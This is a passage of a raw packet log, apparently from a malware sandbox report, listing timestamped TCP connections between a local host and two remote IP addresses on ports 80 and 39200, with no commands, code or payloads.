                              Aug 2, 2021 15:03:10.350434065 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.350454092 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.350455999 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.350476980 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.350497961 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.350565910 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.350574017 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.350585938 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.350600958 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.350620031 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.350627899 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.350639105 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.350660086 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.350667953 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.350675106 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.350689888 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.350704908 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.350719929 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.350733042 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.350749016 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.350764036 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.350779057 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.350795031 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.350810051 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.350826979 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.350841045 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.350857019 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.350878954 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.350903988 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.350922108 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.350943089 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.351134062 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.409254074 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.409315109 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.409352064 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.409425020 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.409436941 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.409482002 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.409538031 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.409607887 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.409661055 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.409670115 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.409698009 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.409953117 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.409993887 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.410032034 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.410891056 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.410927057 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.412682056 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.412710905 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.412714005 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.415751934 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.415795088 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.415849924 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416166067 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416193962 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416219950 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416243076 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416268110 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416290998 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416313887 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416337967 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416359901 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416388035 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416413069 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416434050 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416459084 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416481972 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416503906 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416527033 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416549921 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416578054 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416654110 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416676998 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416701078 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416723967 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416765928 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416789055 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416815996 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416838884 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416862011 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416884899 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416907072 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416929960 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416954041 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.416975975 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.417006969 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.417032957 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.417215109 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.417233944 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.417237997 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.417241096 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.417243958 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.417246103 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.417249918 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.417253017 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.417256117 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.417258024 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.417260885 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.417263031 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.417265892 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.417268038 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.417270899 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.417273045 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.417275906 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.417278051 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.417280912 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.482404947 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482423067 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482441902 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482460022 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482477903 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482495070 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482511997 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482531071 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482547998 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482564926 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482582092 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482599974 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482616901 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482635021 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482652903 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482670069 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482687950 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482892990 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482929945 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482955933 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.482974052 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.483016968 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.483042002 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.483066082 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.483082056 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.483181000 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.483211994 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.483299971 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.483306885 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.483309984 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.486283064 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.486361027 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.486591101 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.487206936 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.487282991 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.487442017 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.487569094 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.487658978 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.487705946 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.487771034 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.487819910 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.487862110 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.487977028 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.488636017 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.488656044 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.488658905 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.488662004 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.488665104 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.488668919 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.488672018 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.488675117 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.488677979 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.488681078 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.488684893 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.488972902 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.489002943 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.489023924 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.489043951 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.489063978 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.489073992 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.489084959 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.489101887 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.489108086 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.489130020 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.489134073 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.489150047 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.489160061 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.489173889 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.489192963 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.489198923 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.489207983 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.489224911 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.489281893 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.541975021 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543138981 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543164968 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543185949 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543185949 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.543203115 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543226004 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543225050 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.543246984 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543248892 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.543268919 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543292046 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543299913 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.543313026 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543328047 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.543338060 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543360949 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543365002 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.543380976 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543401957 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543423891 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543445110 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543468952 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543469906 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.543474913 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.543478012 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.543488979 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543514967 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543518066 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.543539047 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543543100 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.543562889 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.543581963 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.543587923 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.544773102 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.544789076 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.544806004 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.544831038 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.544853926 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.544878006 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.544904947 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.544929981 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.544951916 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.544975042 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.544997931 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545022011 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545044899 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545068026 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545092106 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545115948 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545136929 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545149088 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.545159101 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545182943 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545211077 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545234919 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545236111 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.545270920 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.545274019 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545296907 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545303106 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.545320988 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545344114 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545344114 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.545370102 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545384884 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.545392990 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545416117 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545427084 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.545439959 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545461893 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.545463085 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.545521021 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.545542955 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.596812010 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.596843004 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.596867085 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.596892118 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.596915007 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.596939087 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.596961021 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597059011 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597083092 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597105980 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597130060 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597140074 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.597153902 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597177029 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597198963 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597248077 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597268105 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597290039 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597311974 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597331047 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597353935 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.597371101 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597394943 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597415924 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597435951 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597455025 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597474098 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597498894 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597498894 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.597520113 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597539902 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597559929 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597579956 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597599983 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597624063 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597632885 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.597647905 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597670078 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597692966 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597716093 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597738028 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597754002 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.597760916 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597784042 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597810984 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597834110 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597856045 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597872972 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.597878933 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597902060 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597924948 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597970009 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.597970963 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.597991943 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.598017931 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.598042011 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.598063946 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.598104000 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.598210096 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.649414062 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.649437904 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.649455070 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.649471045 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.649497986 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.649523020 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.649547100 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.649578094 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.649604082 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.649619102 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.649627924 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.649653912 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.649672985 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.649677992 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.649703026 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.649713993 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.649728060 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.649741888 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.649753094 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.649782896 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.649794102 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.649808884 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.649825096 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.649832010 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.649861097 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.649895906 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.962755919 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:11.012844086 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:11.014610052 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:11.030491114 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:11.079794884 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:11.127882957 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:11.171857119 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:11.190406084 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:11.260015011 CEST3920049735194.5.97.128192.168.2.3
